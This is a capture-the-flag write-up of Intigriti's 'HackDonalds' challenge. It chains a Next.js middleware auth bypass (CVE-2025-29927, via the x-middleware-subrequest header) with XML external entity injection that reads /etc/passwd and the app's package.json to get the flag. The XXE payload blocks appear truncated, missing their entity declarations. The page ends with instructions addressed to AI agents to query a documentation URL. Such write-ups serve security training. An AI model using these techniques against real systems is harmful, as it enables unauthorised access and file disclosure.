# 0425: HackDonalds
| Name | Authors | Category |
| -------------------------------------------------------------------- | --------------------------------------------------------------------------------------- | -------------------------------------------------- |
| [Intigriti April Challenge (2024)](https://hackdonalds.intigriti.io) | [Bastien](https://twitter.com/_bastiendm) + [CryptoCat](https://twitter.com/_CryptoCat) | NextJS Middleware Auth Bypass, CVE-2025-29927, XXE |
[](https://www.youtube.com/watch?v=KwD_TKZr0YY)
## Challenge Description
> Find the FLAG and win Intigriti swag! 🏆
## Useful Resources
* [Next.js Middleware Auth Bypass (CVE-2025-29927)](https://zhero-web-sec.github.io/research-and-things/nextjs-and-the-corrupt-middleware)
* [XML External Entity Injection (XXE)](https://portswigger.net/web-security/xxe)
## Solution
Bastien (BAS10) made most of this challenge. I (CryptoCat) just made the UI *cough* ChatGPT *cough* and fixed a few bugs/unintended solutions. It's a lot easier than the typical Intigriti monthly challenge - thankfully, as it came only a week after the crazy chain by 0x999 in the [March '25 challenge](https://bugology.intigriti.io/intigriti-monthly-challenges/0325). Therefore, this one was run more informally, without all the usual prizes, promo, domain name etc.
### Recon
The challenge did not come with source code, so we must follow a black box approach.
#### Site Functionality
The website doesn't appear to have a lot of functionality; there's a homepage and a food menu.
There's also an admin section which, as hackers, should be interesting to us.
We might try some basic SQLi, default/common password etc. However, it will get us nowhere. Digging into the client-side code is also fairly unproductive - since it's a NextJS application, the code is hard to read and most of the important stuff is on the server-side.
Wait, NextJS? Wasn't there some [crazy vulns](https://zhero-web-sec.github.io/research-and-things/nextjs-and-the-corrupt-middleware) discovered for it recently 🤔 Let's check the version with Wappalyzer 👀
Back to the advisory:
**CVE-2025-29927** affects **all Next.js versions from 11.1.4 up to 15.1.7** and allows **middleware bypass** via a specially crafted `x-middleware-subrequest` header.
Vulnerability confirmed ✅
### Next.js Middleware Auth Bypass (CVE-2025-29927)
Middleware in Next.js is commonly used for:
* Authentication / Authorization
* Rewrites / Redirects
* Adding security headers (CSP, etc.)
This vulnerability allows attackers to **bypass middleware protections entirely**, leading to:
* **Authorization bypass**
* **Content Security Policy (CSP) bypass**
* **DoS via Cache Poisoning (CPDoS)**
An auth bypass would be perfect for us! Maybe it can get us into the admin panel without knowing the password?
Let's request the `/admin` page while including the following HTTP header.
```json
x-middleware-subrequest: middleware
```
Easy! Now we just need to include this header on each request to maintain our access 😎
We can only click on the `Ice Cream Machines` option, which allows us to view the settings of various machines (notoriously buggy/broken at HackDonalds 👀)
### XML External Entity Injection (XXE)
So, what do we have here? An XML config input that can be parsed.
Any CTF player or bug bounty hunter should know what to check for here; XXE 👇
**XXE (XML External Entity)** is a vulnerability that occurs when an XML parser **processes external entities** defined in XML documents. If not properly configured, it can be exploited to:
* **Read local files** (`file:///etc/passwd`)
* **Perform SSRF** (e.g., hitting internal services)
* **DoS** via "billion laughs" attack
* **Exfiltrate data** via out-of-band channels (OAST, DNS, etc.)
If we replace the parsed input with a payload to read `/etc/passwd`
```xml
]>
1
&xxe;
-18
75
2025-03-15
Daily
```
We successfully retrieve the file contents!
#### Local File Read (Source Code Disclosure)
Where is the flag though? In a real world scenario, we might look for common files of interest (plenty of wordlists online). Since we know this is a NextJS app, why don't we ask ChatGPT what the common location is and what interesting files it might have?
Nice, so we can try enumerating all of these files starting with the `/app/` directory 😼
```xml
]>
1
&xxe;
-18
75
2025-03-15
Daily
```
There we have our flag: `INTIGRITI{XXE_1n_Ic3Cr34m_M4ch1n3s}` 🚩
Some players retrieved the same file from `/proc/self/cwd/package.json` or simply `package.json`
## Community Writeups
1. [r0guebyte](https://rentry.co/r0gue-writeup-hackdonalds-dad1001f-2238-49ce-80e0-952a0a1cb944)
2. [excile](https://gist.github.com/excile1/56044173c39a28635f547f3bbedf05b5)
3. [gurux090](https://gurudattchoudhary.medium.com/intigriti-hackdonalds-ctf-writeup-chaining-next-js-fa0d8f6acbef)
4. [wa1m3im](https://gist.github.com/Wa1m3im/b0d1a087a9e363d66fc50cfdb8ea705f)
5. [optybg](https://www.notion.so/HackDonalds-Challenge-Writeup-1d39b56cbe8880ccb168ff03a9f60c8e?pvs=4)
6. [gilsgil](https://intigriti.hatamotosec.com/hackdonalds-writeup/ec4ac52ad1c4c88f1588fa68510cbaf8.html)
7. [boffman](https://gist.github.com/boffman/258bf6b13d59cbcfa507b15b414c3b2d)
8. [harshilsecops](https://medium.com/@harshilsecops/820933e85d99)
9. [ruur](https://ruur.gitbook.io/ctf-writeups/ctf-writeups/hackdonalds-intigriti)
10. [nagasaikiran](https://nagasaikiran.com/hackdonalds-challenge-writeup)
11. [khandlq](https://www.notion.so/Challenge-https-app-intigriti-com-programs-intigriti-challenge-hackdonalds-detail-1d0fde163055800cb1f1fbe8dff8f666?pvs=4)
12. [priesthood\_singh](https://medium.com/@adityagulati07/intigriti-hackdonalds-challenge-cb8d7e60ee7c)
13. [mami](https://github.com/MaMi364/Hackdonalds-Intigriti)
14. [roys](https://github.com/roys/ctf-writeups/tree/main/intigriti-2025-04)
15. [cybersecu](https://gist.github.com/Siss3l/7a6b55978214325f60464f4f92ecce07)
16. [juniorbrets](https://medium.com/@cipher01x/breaking-into-hackdonalds-xxe-middleware-abuse-ctf-writeup-5e67fadbb1bd)
17. [rishal865](https://www.linkedin.com/posts/mohammed-rishal-0453a8212_hackdonalds-ctf-activity-7318131723127468033-ilJJ)
18. [vilz](https://github.com/LuisVila99/hackdonalds)
19. [cybrik](https://medium.com/@shreechandragiri21/hacking-hackdonalds-from-auth-bypass-to-xxe-my-3-hour-midnight-frenzy-0a5e120af2b2)
20. [cybercrusader](https://medium.com/@vighnesh.cybersec/breaking-the-ice-cream-machines-a-hackdonalds-ctf-story-of-auth-bypass-and-xml-shenanigans-4d648eab7f33)
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://bugology.intigriti.io/intigriti-monthly-challenges/0425.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.